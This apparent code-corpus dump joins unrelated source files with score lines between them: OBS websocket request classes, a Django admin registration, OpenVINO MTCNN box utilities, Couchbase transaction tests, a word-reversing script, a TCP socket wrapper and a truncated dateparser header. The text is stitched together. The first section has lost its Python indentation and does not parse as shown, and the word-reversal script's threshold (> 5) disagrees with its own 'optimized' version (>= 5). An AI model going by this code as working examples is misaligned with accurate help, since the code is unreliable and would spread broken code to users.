*sceneName*
type: String
Name of the scene to create.
"""
def __init__(self, sceneName):
Baserequests.__init__(self)
self.name = 'CreateScene'
self.dataout['sceneName'] = sceneName
class ReorderSceneItems(Baserequests):
"""Changes the order of scene items in the requested scene.
:Arguments:
*scene*
type: String (optional)
Name of the scene to reorder (defaults to current).
*items*
type: Array<Scene>
Ordered list of objects with name and/or id specified. Id preferred due to uniqueness per scene
*items.*.id*
type: int (optional)
Id of a specific scene item. Unique on a scene by scene basis.
*items.*.name*
type: String (optional)
Name of a scene item. Sufficiently unique if no scene items share sources within the scene.
"""
def __init__(self, items, scene=None):
Baserequests.__init__(self)
self.name = 'ReorderSceneItems'
self.dataout['items'] = items
self.dataout['scene'] = scene
class SetSceneTransitionOverride(Baserequests):
"""Set a scene to use a specific transition override.
:Arguments:
*sceneName*
type: String
Name of the scene to set the transition override on.
*transitionName*
type: String
Name of the transition to use.
*transitionDuration*
type: int (Optional)
Duration in milliseconds of the transition if transition is not fixed. Defaults to the current duration specified in the UI if there is no current override and this value is not given.
"""
def __init__(self, sceneName, transitionName, transitionDuration=None):
Baserequests.__init__(self)
self.name = 'SetSceneTransitionOverride'
self.dataout['sceneName'] = sceneName
self.dataout['transitionName'] = transitionName
self.dataout['transitionDuration'] = transitionDuration
class RemoveSceneTransitionOverride(Baserequests):
"""Remove any transition override on a scene.
:Arguments:
*sceneName*
type: String
Name of the scene to remove the transition override from.
"""
def __init__(self, sceneName):
Baserequests.__init__(self)
self.name = 'RemoveSceneTransitionOverride'
self.dataout['sceneName'] = sceneName
class GetSceneTransitionOverride(Baserequests):
"""Get the current scene transition override.
:Arguments:
*sceneName*
type: String
Name of the scene to get the transition override of.
:Returns:
*transitionName*
type: String
Name of the current overriding transition. Empty string if no override is set.
*transitionDuration*
type: int
Transition duration. `-1` if no override is set.
"""
def __init__(self, sceneName):
Baserequests.__init__(self)
self.name = 'GetSceneTransitionOverride'
self.datain['transitionName'] = None
self.datain['transitionDuration'] = None
self.dataout['sceneName'] = sceneName
def getTransitionName(self):
return self.datain['transitionName']
def getTransitionDuration(self):
return self.datain['transitionDuration']
class GetStreamingStatus(Baserequests):
"""Get current streaming and recording status.
:Returns:
*streaming*
type: boolean
Current streaming status.
*recording*
type: boolean
Current recording status.
*stream_timecode*
type: String (optional)
Time elapsed since streaming started (only present if currently streaming).
*rec_timecode*
type: String (optional)
Time elapsed since recording started (only present if currently recording).
*preview_only*
type: boolean
Always false. Retrocompatibility with OBSRemote.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetStreamingStatus'
self.datain['streaming'] = None
self.datain['recording'] = None
self.datain['stream-timecode'] = None
self.datain['rec-timecode'] = None
self.datain['preview-only'] = None
def getStreaming(self):
return self.datain['streaming']
def getRecording(self):
return self.datain['recording']
def getStreamTimecode(self):
return self.datain['stream-timecode']
def getRecTimecode(self):
return self.datain['rec-timecode']
def getPreviewOnly(self):
return self.datain['preview-only']
class StartStopStreaming(Baserequests):
"""Toggle streaming on or off (depending on the current stream state).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartStopStreaming'
class StartStreaming(Baserequests):
"""Start streaming.
Will return an `error` if streaming is already active.
:Arguments:
*stream*
type: Object (optional)
Special stream configuration. Please note: these won't be saved to OBS' configuration.
*stream.type*
type: String (optional)
If specified ensures the type of stream matches the given type (usually 'rtmp_custom' or 'rtmp_common'). If the currently configured stream type does not match the given stream type, all settings must be specified in the `settings` object or an error will occur when starting the stream.
*stream.metadata*
type: Object (optional)
Adds the given object parameters as encoded query string parameters to the 'key' of the RTMP stream. Used to pass data to the RTMP service about the streaming. May be any String, Numeric, or Boolean field.
*stream.settings*
type: Object (optional)
Settings for the stream.
*stream.settings.server*
type: String (optional)
The publish URL.
*stream.settings.key*
type: String (optional)
The publish key of the stream.
*stream.settings.use_auth*
type: boolean (optional)
Indicates whether authentication should be used when connecting to the streaming server.
*stream.settings.username*
type: String (optional)
If authentication is enabled, the username for the streaming server. Ignored if `use_auth` is not set to `true`.
*stream.settings.password*
type: String (optional)
If authentication is enabled, the password for the streaming server. Ignored if `use_auth` is not set to `true`.
"""
def __init__(self, stream=None):
Baserequests.__init__(self)
self.name = 'StartStreaming'
self.dataout['stream'] = stream
class StopStreaming(Baserequests):
"""Stop streaming.
Will return an `error` if streaming is not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StopStreaming'
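# --- Usage sketch (not part of the generated protocol classes) --------------
# StartStreaming errors when a stream is already live, so the sketch consults
# GetStreamingStatus first. The optional one-off `stream` override shown in
# the trailing comment is not persisted to the OBS configuration; the stream
# key in it is a placeholder. `ws` is an assumed connected client.
def _example_go_live_if_idle(ws):
    """Start streaming with the currently configured service if not live yet."""
    if not ws.call(GetStreamingStatus()).getStreaming():
        ws.call(StartStreaming())
    # One-off settings override instead (not saved):
    # ws.call(StartStreaming(stream={"settings": {"key": "live_xxxx"}}))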
class SetStreamSettings(Baserequests):
"""Sets one or more attributes of the current streaming server settings. Any options not passed will remain unchanged. Returns the updated settings in response. If 'type' is different than the current streaming service type, all settings are required. Returns the full settings of the stream (the same as GetStreamSettings).
:Arguments:
*type*
type: String
The type of streaming service configuration, usually `rtmp_custom` or `rtmp_common`.
*settings*
type: Object
The actual settings of the stream.
*settings.server*
type: String (optional)
The publish URL.
*settings.key*
type: String (optional)
The publish key.
*settings.use_auth*
type: boolean (optional)
Indicates whether authentication should be used when connecting to the streaming server.
*settings.username*
type: String (optional)
The username for the streaming service.
*settings.password*
type: String (optional)
The password for the streaming service.
*save*
type: boolean
Persist the settings to disk.
"""
def __init__(self, type, settings, save):
Baserequests.__init__(self)
self.name = 'SetStreamSettings'
self.dataout['type'] = type
self.dataout['settings'] = settings
self.dataout['save'] = save
class GetStreamSettings(Baserequests):
"""Get the current streaming server settings.
:Returns:
*type*
type: String
The type of streaming service configuration. Possible values: 'rtmp_custom' or 'rtmp_common'.
*settings*
type: Object
Stream settings object.
*settings.server*
type: String
The publish URL.
*settings.key*
type: String
The publish key of the stream.
*settings.use_auth*
type: boolean
Indicates whether authentication should be used when connecting to the streaming server.
*settings.username*
type: String
The username to use when accessing the streaming server. Only present if `use_auth` is `true`.
*settings.password*
type: String
The password to use when accessing the streaming server. Only present if `use_auth` is `true`.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetStreamSettings'
self.datain['type'] = None
self.datain['settings'] = None
def getType(self):
return self.datain['type']
def getSettings(self):
return self.datain['settings']
class SaveStreamSettings(Baserequests):
"""Save the current streaming server settings to disk.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'SaveStreamSettings'
class SendCaptions(Baserequests):
"""Send the provided text as embedded CEA-608 caption data.
:Arguments:
*text*
type: String
Captions text
"""
def __init__(self, text):
Baserequests.__init__(self)
self.name = 'SendCaptions'
self.dataout['text'] = text
class GetStudioModeStatus(Baserequests):
"""Indicates if Studio Mode is currently enabled.
:Returns:
*studio_mode*
type: boolean
Indicates if Studio Mode is enabled.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetStudioModeStatus'
self.datain['studio-mode'] = None
def getStudioMode(self):
return self.datain['studio-mode']
class GetPreviewScene(Baserequests):
"""Get the name of the currently previewed scene and its list of sources.
Will return an `error` if Studio Mode is not enabled.
:Returns:
*name*
type: String
The name of the active preview scene.
*sources*
type: Array<SceneItem>
List of sources of the active preview scene.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetPreviewScene'
self.datain['name'] = None
self.datain['sources'] = None
def getName(self):
return self.datain['name']
def getSources(self):
return self.datain['sources']
class SetPreviewScene(Baserequests):
"""Set the active preview scene.
Will return an `error` if Studio Mode is not enabled.
:Arguments:
*scene_name*
type: String
The name of the scene to preview.
"""
def __init__(self, scene_name):
Baserequests.__init__(self)
self.name = 'SetPreviewScene'
self.dataout['scene-name'] = scene_name
class TransitionToProgram(Baserequests):
"""Transitions the currently previewed scene to the main output.
Will return an `error` if Studio Mode is not enabled.
:Arguments:
*with_transition*
type: Object (optional)
Change the active transition before switching scenes. Defaults to the active transition.
*with_transition.name*
type: String
Name of the transition.
*with_transition.duration*
type: int (optional)
Transition duration (in milliseconds).
"""
def __init__(self, with_transition=None):
Baserequests.__init__(self)
self.name = 'TransitionToProgram'
self.dataout['with-transition'] = with_transition
class EnableStudioMode(Baserequests):
"""Enables Studio Mode.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'EnableStudioMode'
class DisableStudioMode(Baserequests):
"""Disables Studio Mode.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'DisableStudioMode'
class ToggleStudioMode(Baserequests):
"""Toggles Studio Mode (depending on the current state of studio mode).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ToggleStudioMode'
class GetTransitionList(Baserequests):
"""List of all transitions available in the frontend's dropdown menu.
:Returns:
*current_transition*
type: String
Name of the currently active transition.
*transitions*
type: Array<Object>
List of transitions.
*transitions.*.name*
type: String
Name of the transition.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetTransitionList'
self.datain['current-transition'] = None
self.datain['transitions'] = None
def getCurrentTransition(self):
return self.datain['current-transition']
def getTransitions(self):
return self.datain['transitions']
class GetCurrentTransition(Baserequests):
"""Get the name of the currently selected transition in the frontend's dropdown menu.
:Returns:
*name*
type: String
Name of the selected transition.
*duration*
type: int (optional)
Transition duration (in milliseconds) if supported by the transition.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetCurrentTransition'
self.datain['name'] = None
self.datain['duration'] = None
def getName(self):
return self.datain['name']
def getDuration(self):
return self.datain['duration']
class SetCurrentTransition(Baserequests):
"""Set the active transition.
:Arguments:
*transition_name*
type: String
The name of the transition.
"""
def __init__(self, transition_name):
Baserequests.__init__(self)
self.name = 'SetCurrentTransition'
self.dataout['transition-name'] = transition_name
class SetTransitionDuration(Baserequests):
"""Set the duration of the currently selected transition if supported.
:Arguments:
*duration*
type: int
Desired duration of the transition (in milliseconds).
"""
def __init__(self, duration):
Baserequests.__init__(self)
self.name = 'SetTransitionDuration'
self.dataout['duration'] = duration
class GetTransitionDuration(Baserequests):
"""Get the duration of the currently selected transition if supported.
:Returns:
*transition_duration*
type: int
Duration of the current transition (in milliseconds).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetTransitionDuration'
self.datain['transition-duration'] = None
def getTransitionDuration(self):
return self.datain['transition-duration']
class GetTransitionPosition(Baserequests):
"""Get the position of the current transition.
:Returns:
*position*
type: double
current transition position. This value will be between 0.0 and 1.0. Note: Transition returns 1.0 when not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetTransitionPosition'
self.datain['position'] = None
def getPosition(self):
return self.datain['position']
class GetTransitionSettings(Baserequests):
"""Get the current settings of a transition
:Arguments:
*transitionName*
type: String
Transition name
:Returns:
*transitionSettings*
type: Object
Current transition settings
"""
def __init__(self, transitionName):
Baserequests.__init__(self)
self.name = 'GetTransitionSettings'
self.datain['transitionSettings'] = None
self.dataout['transitionName'] = transitionName
def getTransitionSettings(self):
return self.datain['transitionSettings']
class SetTransitionSettings(Baserequests):
"""Change the current settings of a transition
:Arguments:
*transitionName*
type: String
Transition name
*transitionSettings*
type: Object
Transition settings (they can be partial)
:Returns:
*transitionSettings*
type: Object
Updated transition settings
"""
def __init__(self, transitionName, transitionSettings):
Baserequests.__init__(self)
self.name = 'SetTransitionSettings'
self.datain['transitionSettings'] = None
self.dataout['transitionName'] = transitionName
self.dataout['transitionSettings'] = transitionSettings
def getTransitionSettings(self):
return self.datain['transitionSettings']
class ReleaseTBar(Baserequests):
"""Release the T-Bar (like a user releasing their mouse button after moving it).
*YOU MUST CALL THIS if you called `SetTBarPosition` with the `release` parameter set to `false`.*
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ReleaseTBar'
class SetTBarPosition(Baserequests):
"""
If your code needs to perform multiple successive T-Bar moves (e.g. : in an animation, or in response to a user moving a T-Bar control in your User Interface), set `release` to false and call `ReleaseTBar` later once the animation/interaction is over.
:Arguments:
*position*
type: double
T-Bar position. This value must be between 0.0 and 1.0.
*release*
type: boolean (optional)
Whether or not the T-Bar gets released automatically after setting its new position (like a user releasing their mouse button after moving the T-Bar). Call `ReleaseTBar` manually if you set `release` to false. Defaults to true.
"""
def __init__(self, position, release=None):
Baserequests.__init__(self)
self.name = 'SetTBarPosition'
self.dataout['position'] = position
self.dataout['release'] = release
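# Illustrative usage sketch: the request classes above only assemble the outgoing
# payload (`name` plus `dataout`); actually sending it requires an obs-websocket
# client object, which is outside this excerpt, so that step is shown only as a
# comment with a hypothetical variable `ws`.
if __name__ == "__main__":
    req = SetPreviewScene("My Scene")
    print(req.name, req.dataout)        # 'SetPreviewScene', dataout carries {'scene-name': 'My Scene'}
    trans = TransitionToProgram(with_transition={"name": "Fade", "duration": 300})
    print(trans.name, trans.dataout)    # 'TransitionToProgram', dataout carries {'with-transition': {...}}
    # response = ws.call(req)           # hypothetical: send via a connected obs-websocket client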
| 2.0625 | 2 |
simple_history/tests/custom_user/admin.py | rdurica/django-simple-history | 911 | 3321 | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from .models import CustomUser
admin.site.register(CustomUser, UserAdmin)
| 1.335938 | 1 |
tools/accuracy_checker/openvino/tools/accuracy_checker/evaluators/custom_evaluators/mtcnn_evaluator_utils.py | Pandinosaurus/open_model_zoo | 1 | 3322 | """
Copyright (c) 2018-2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import OrderedDict
import cv2
import numpy as np
from ...adapters import MTCNNPAdapter
def calibrate_predictions(previous_stage_predictions, out, threshold, outputs_mapping, iou_type=None):
prob_out = outputs_mapping['probability_out']
if prob_out not in out[0]:
prob_out = prob_out + '/sink_port_0' if '/sink_port_0' not in prob_out else prob_out.replace('/sink_port_0', '')
score = out[0][prob_out][:, 1]
pass_t = np.where(score > 0.7)[0]
removed_boxes = [i for i in range(previous_stage_predictions[0].size) if i not in pass_t]
previous_stage_predictions[0].remove(removed_boxes)
previous_stage_predictions[0].scores = score[pass_t]
bboxes = np.c_[
previous_stage_predictions[0].x_mins, previous_stage_predictions[0].y_mins,
previous_stage_predictions[0].x_maxs, previous_stage_predictions[0].y_maxs,
previous_stage_predictions[0].scores
]
region_out = outputs_mapping['region_out']
if region_out not in out[0]:
region_out = (
region_out + '/sink_port_0' if '/sink_port_0' not in region_out else region_out.replace('/sink_port_0', '')
)
mv = out[0][region_out][pass_t]
if iou_type:
previous_stage_predictions[0], peek = nms(previous_stage_predictions[0], threshold, iou_type)
bboxes = np.c_[
previous_stage_predictions[0].x_mins, previous_stage_predictions[0].y_mins,
previous_stage_predictions[0].x_maxs, previous_stage_predictions[0].y_maxs,
previous_stage_predictions[0].scores
]
mv = mv[np.sort(peek).astype(int)]
x_mins, y_mins, x_maxs, y_maxs, _ = bbreg(bboxes, mv.T).T
previous_stage_predictions[0].x_mins = x_mins
previous_stage_predictions[0].y_mins = y_mins
previous_stage_predictions[0].x_maxs = x_maxs
previous_stage_predictions[0].y_maxs = y_maxs
return previous_stage_predictions
def nms(prediction, threshold, iou_type):
bboxes = np.c_[prediction.x_mins, prediction.y_mins, prediction.x_maxs, prediction.y_maxs, prediction.scores]
peek = MTCNNPAdapter.nms(bboxes, threshold, iou_type)
prediction.remove([i for i in range(prediction.size) if i not in peek])
return prediction, peek
def bbreg(boundingbox, reg):
reg = reg.T
# calibrate bounding boxes
w = boundingbox[:, 2] - boundingbox[:, 0] + 1
h = boundingbox[:, 3] - boundingbox[:, 1] + 1
bb0 = boundingbox[:, 0] + reg[:, 0] * w
bb1 = boundingbox[:, 1] + reg[:, 1] * h
bb2 = boundingbox[:, 2] + reg[:, 2] * w
bb3 = boundingbox[:, 3] + reg[:, 3] * h
boundingbox[:, 0:4] = np.array([bb0, bb1, bb2, bb3]).T
return boundingbox
def filter_valid(dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph):
mask = np.ones(len(tmph))
tmp_ys_len = (edy + 1) - dy
tmp_xs_len = (edx + 1) - dx
img_ys_len = (ey + 1) - y
img_xs_len = (ex + 1) - x
mask = np.logical_and(mask, np.logical_and(tmph > 0, tmpw > 0))
mask = np.logical_and(mask, np.logical_and(tmp_ys_len > 0, tmp_xs_len > 0))
mask = np.logical_and(mask, np.logical_and(img_xs_len > 0, img_ys_len > 0))
mask = np.logical_and(mask, np.logical_and(tmp_xs_len == img_xs_len, tmp_ys_len == img_ys_len))
return dy[mask], edy[mask], dx[mask], edx[mask], y[mask], ey[mask], x[mask], ex[mask], tmpw[mask], tmph[mask], mask
def pad(boxesA, h, w):
boxes = boxesA.copy()
tmph = boxes[:, 3] - boxes[:, 1] + 1
tmpw = boxes[:, 2] - boxes[:, 0] + 1
numbox = boxes.shape[0]
dx = np.ones(numbox)
dy = np.ones(numbox)
edx = tmpw
edy = tmph
x = boxes[:, 0:1][:, 0]
y = boxes[:, 1:2][:, 0]
ex = boxes[:, 2:3][:, 0]
ey = boxes[:, 3:4][:, 0]
tmp = np.where(ex > w)[0]
if tmp.shape[0] != 0:
edx[tmp] = -ex[tmp] + w - 1 + tmpw[tmp]
ex[tmp] = w - 1
tmp = np.where(ey > h)[0]
if tmp.shape[0] != 0:
edy[tmp] = -ey[tmp] + h - 1 + tmph[tmp]
ey[tmp] = h - 1
tmp = np.where(x < 1)[0]
if tmp.shape[0] != 0:
dx[tmp] = 2 - x[tmp]
x[tmp] = np.ones_like(x[tmp])
tmp = np.where(y < 1)[0]
if tmp.shape[0] != 0:
dy[tmp] = 2 - y[tmp]
y[tmp] = np.ones_like(y[tmp])
# for python index from 0, while matlab from 1
dy, dx = np.maximum(0, dy - 1), np.maximum(0, dx - 1)
y = np.maximum(0, y - 1)
x = np.maximum(0, x - 1)
edy = np.maximum(0, edy - 1)
edx = np.maximum(0, edx - 1)
ey = np.maximum(0, ey - 1)
ex = np.maximum(0, ex - 1)
return filter_valid(dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph)
def rerec(bboxA):
w = bboxA[:, 2] - bboxA[:, 0]
h = bboxA[:, 3] - bboxA[:, 1]
max_side = np.maximum(w, h).T
bboxA[:, 0] = bboxA[:, 0] + w * 0.5 - max_side * 0.5
bboxA[:, 1] = bboxA[:, 1] + h * 0.5 - max_side * 0.5
bboxA[:, 2:4] = bboxA[:, 0:2] + np.repeat([max_side], 2, axis=0).T
return bboxA
def cut_roi(image, prediction, dst_size, include_bound=True):
bboxes = np.c_[prediction.x_mins, prediction.y_mins, prediction.x_maxs, prediction.y_maxs, prediction.scores]
img = image.data
bboxes = rerec(bboxes)
bboxes[:, 0:4] = np.fix(bboxes[:, 0:4])
dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph, mask = pad(bboxes, *img.shape[:2])
bboxes = bboxes[mask]
numbox = bboxes.shape[0]
tempimg = np.zeros((numbox, dst_size, dst_size, 3))
for k in range(numbox):
tmp_k_h, tmp_k_w = int(tmph[k]) + int(include_bound), int(tmpw[k]) + int(include_bound)
tmp = np.zeros((tmp_k_h, tmp_k_w, 3))
tmp_ys, tmp_xs = slice(int(dy[k]), int(edy[k]) + 1), slice(int(dx[k]), int(edx[k]) + 1)
img_ys, img_xs = slice(int(y[k]), int(ey[k]) + 1), slice(int(x[k]), int(ex[k]) + 1)
tmp[tmp_ys, tmp_xs] = img[img_ys, img_xs]
tempimg[k, :, :, :] = cv2.resize(tmp, (dst_size, dst_size))
image.data = tempimg
return image
def transform_for_callback(batch_size, raw_outputs):
output_per_box = []
fq_weights = []
for i in range(batch_size):
box_outs = OrderedDict()
for layer_name, data in raw_outputs[0].items():
if layer_name in fq_weights:
continue
if layer_name.endswith('fq_weights_1'):
fq_weights.append(layer_name)
box_outs[layer_name] = data
elif data.shape[0] <= i:
box_outs[layer_name] = data
else:
box_outs[layer_name] = np.expand_dims(data[i], axis=0)
output_per_box.append(box_outs)
return output_per_box
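# Illustrative check (numpy only, arbitrary values): rerec() expands a rectangle
# into a square of side max(w, h) around the same centre and keeps the trailing
# score column untouched.
if __name__ == "__main__":
    boxes = np.array([[0., 0., 10., 20., 0.9]])
    print(rerec(boxes.copy()))          # -> [[-5.  0. 15. 20.  0.9]]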
| 1.796875 | 2 |
pytests/Atomicity/basic_ops.py | ashwin2002/TAF | 0 | 3323 | <gh_stars>0
from Cb_constants import DocLoading
from basetestcase import ClusterSetup
from couchbase_helper.documentgenerator import DocumentGenerator, doc_generator
from couchbase_helper.tuq_generators import JsonGenerator
from remote.remote_util import RemoteMachineShellConnection
from sdk_client3 import SDKClient
from com.couchbase.client.java.json import JsonObject
"""
Basic test cases with commit, rollback scenarios
"""
class basic_ops(ClusterSetup):
def setUp(self):
super(basic_ops, self).setUp()
if self.num_buckets:
self.bucket_util.create_multiple_buckets(
self.cluster.master,
self.num_replicas,
bucket_count=self.num_buckets,
bucket_type=self.bucket_type,
ram_quota=self.bucket_size,
storage=self.bucket_storage,
eviction_policy=self.bucket_eviction_policy)
else:
self.create_bucket()
self.sleep(10, "Wait for bucket to become ready for ops")
# Reset active_resident_threshold to avoid further data load as DGM
self.active_resident_threshold = 0
self.log.info("==========Finished Basic_ops base setup========")
def tearDown(self):
super(basic_ops, self).tearDown()
def get_doc_generator(self, start, end):
age = range(5)
first = ['james', 'sharon']
body = [''.rjust(self.doc_size - 10, 'a')]
template = JsonObject.create()
template.put("age", None)
template.put("first_name", None)
template.put("body", None)
generator = DocumentGenerator(self.key, template, randomize=True,
age=age,
first_name=first, body=body,
start=start, end=end,
key_size=self.key_size,
doc_size=self.doc_size,
doc_type=self.doc_type)
return generator
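    # Illustrative note: with the template above, each generated document is a JSON
    # object of the form {"age": <0-4>, "first_name": "james"/"sharon", "body": "aaa..."},
    # with document keys derived from self.key and padded according to key_size/doc_size.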
@staticmethod
def generate_docs_bigdata(docs_per_day, start=0, document_size=1024000):
json_generator = JsonGenerator()
return json_generator.generate_docs_bigdata(end=docs_per_day,
start=start,
value_size=document_size)
def test_basic_commit(self):
"""
Test transaction commit, rollback, time ahead,
time behind scenarios with replica, persist_to and
replicate_to settings
"""
# Atomicity.basic_ops.basic_ops.test_basic_commit
self.drift_ahead = self.input.param("drift_ahead", False)
self.drift_behind = self.input.param("drift_behind", False)
gen_create = self.get_doc_generator(0, self.num_items)
self.op_type = self.input.param("op_type", 'create')
if self.drift_ahead:
shell = RemoteMachineShellConnection(self.servers[0])
self.assertTrue(shell.change_system_time(3600),
'Failed to advance the clock')
output, _ = shell.execute_command('date')
self.log.info('Date after is set forward {0}'.format(output))
if self.drift_behind:
shell = RemoteMachineShellConnection(self.servers[0])
self.assertTrue(shell.change_system_time(-3600),
                            'Failed to set the clock back')
output, _ = shell.execute_command('date')
self.log.info('Date after is set behind {0}'.format(output))
self.log.info("Loading docs using AtomicityTask")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, self.op_type, exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries, update_count=self.update_count,
transaction_timeout=self.transaction_timeout,
commit=self.transaction_commit, durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.log.info("going to execute the task")
self.task.jython_task_manager.get_task_result(task)
if self.op_type == "time_out":
self.sleep(90, "Wait for staged docs to get cleared")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, "create", exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries, update_count=self.update_count,
transaction_timeout=200,
commit=self.transaction_commit,
durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.task_manager.get_task_result(task)
def test_large_doc_size_commit(self):
gen_create = self.generate_docs_bigdata(docs_per_day=self.num_items,
document_size=self.doc_size)
self.log.info("going to create a task")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, "create", exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries,
transaction_timeout=self.transaction_timeout,
commit=self.transaction_commit, durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.log.info("going to execute the task")
self.task.jython_task_manager.get_task_result(task)
def test_MB_41944(self):
num_index = self.input.param("num_index", 1)
# Create doc_gen for loading
doc_gen = doc_generator(self.key, 0, 1)
# Get key for delete op and reset the gen
key, v = doc_gen.next()
doc_gen.reset()
# Open SDK client connection
client = SDKClient([self.cluster.master], self.bucket_util.buckets[0])
query = list()
query.append("CREATE PRIMARY INDEX index_0 on %s USING GSI"
% self.bucket_util.buckets[0].name)
if num_index == 2:
query.append("CREATE INDEX index_1 on %s(name,age) "
"WHERE mutated=0 USING GSI"
% self.bucket_util.buckets[0].name)
# Create primary index on the bucket
for q in query:
client.cluster.query(q)
        # Wait for each index to become online
        for index_num, _ in enumerate(query):
            state_query = "SELECT state FROM system:indexes " \
                          "WHERE name='index_%s'" % index_num
            state = None
            retry = 0
            while retry < 30:
                state = client.cluster.query(state_query) \
                    .rowsAsObject()[0].get("state")
                if state == "online":
                    break
                self.sleep(1)
                retry += 1
            if state != "online":
                self.log_failure("Index 'index_%s' not yet online" % index_num)
# Start transaction to create the doc
trans_task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
doc_gen, DocLoading.Bucket.DocOps.CREATE)
self.task_manager.get_task_result(trans_task)
# Perform sub_doc operation on same key
_, fail = client.crud(DocLoading.Bucket.SubDocOps.INSERT,
key=key, value=["_sysxattr", "sysxattr-payload"],
xattr=True)
if fail:
self.log_failure("Subdoc insert failed: %s" % fail)
else:
self.log.info("Subdoc insert success")
# Delete the created doc
result = client.crud(DocLoading.Bucket.DocOps.DELETE, key)
if result["status"] is False:
self.log_failure("Doc delete failed: %s" % result["error"])
else:
self.log.info("Document deleted")
# Re-insert same doc through transaction
trans_task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
doc_gen, DocLoading.Bucket.DocOps.CREATE)
self.task_manager.get_task_result(trans_task)
# Close SDK Client connection
client.close()
self.validate_test_failure()
| 1.84375 | 2 |
reverseWord.py | lovefov/Python | 0 | 3324 | #!/usr/bin/env python3
#-*- coding:utf-8 -*-
#Author:贾江超
def spin_words(sentence):
    list1 = sentence.split()
    for i in range(len(list1)):
        if len(list1[i]) > 5:
            list1[i] = list1[i][::-1]
    return ' '.join(list1)
'''
Note: len() gives the length of a list in both Python 2.x and 3.x.
Optimized version:
def spin_words(sentence):
# Your code goes here
return " ".join([x[::-1] if len(x) >= 5 else x for x in sentence.split(" ")])
Reversing a string is easy with slicing here: str[::-1] does the job.
'''
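# Quick illustrative check (words longer than five letters get reversed):
if __name__ == '__main__':
    print(spin_words('Hey fellow warriors'))   # -> Hey wollef sroirraw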
| 3.6875 | 4 |
src/scs_host/comms/network_socket.py | south-coast-science/scs_host_cpc | 0 | 3325 | <reponame>south-coast-science/scs_host_cpc<gh_stars>0
"""
Created on 30 May 2017
@author: <NAME> (<EMAIL>)
A network socket abstraction, implementing ProcessComms
"""
import socket
import time
from scs_core.sys.process_comms import ProcessComms
# --------------------------------------------------------------------------------------------------------------------
class NetworkSocket(ProcessComms):
"""
classdocs
"""
__TIMEOUT = 4.0 # seconds
__BUFFER_SIZE = 1024 # bytes
__BACKLOG = 5
__ACK = "ACK"
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, host, port=2000): # a receiving socket should have host ''
"""
Constructor
"""
self.__address = (host, port)
self.__socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
self.__conn = None
# ----------------------------------------------------------------------------------------------------------------
def connect(self, wait_for_availability=True):
while True:
try:
self.__socket.connect(self.__address)
break
except ConnectionRefusedError as ex:
if not wait_for_availability:
raise ConnectionRefusedError(ex)
time.sleep(0.1)
def close(self):
try:
if self.__conn:
self.__conn.close()
except RuntimeError:
pass
try:
self.__socket.close()
except RuntimeError:
pass
# ----------------------------------------------------------------------------------------------------------------
def read(self):
# socket...
self.__socket.bind(self.__address)
self.__socket.listen(NetworkSocket.__BACKLOG)
self.__conn, _ = self.__socket.accept()
# data...
while True:
message = self.__conn.recv(NetworkSocket.__BUFFER_SIZE).decode().strip()
if len(message) == 0:
break
yield message
def write(self, message, wait_for_availability=True):
while True:
try:
# data...
self.__socket.send(message.encode())
# wait for ACK...
timeout = time.time() + NetworkSocket.__TIMEOUT
while self.__socket.recv(NetworkSocket.__BUFFER_SIZE).decode() != NetworkSocket.__ACK:
time.sleep(0.001)
if time.time() > timeout:
break
break
except ConnectionError:
if not wait_for_availability:
raise
self.close()
time.sleep(0.1)
self.__socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
self.connect()
# ----------------------------------------------------------------------------------------------------------------
def ack(self):
self.__conn.send(str(NetworkSocket.__ACK).encode())
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "NetworkSocket:{address:%s, socket:%s}" % (self.__address, self.__socket)
| 2.671875 | 3 |
dateparser/date.py | JKhakpour/dateparser | 2 | 3326 | <reponame>JKhakpour/dateparser
# -*- coding: utf-8 -*-
import calendar
import collections
from datetime import datetime, timedelta
from warnings import warn
import six
import regex as re
from dateutil.relativedelta import relativedelta
from dateparser.date_parser import date_parser
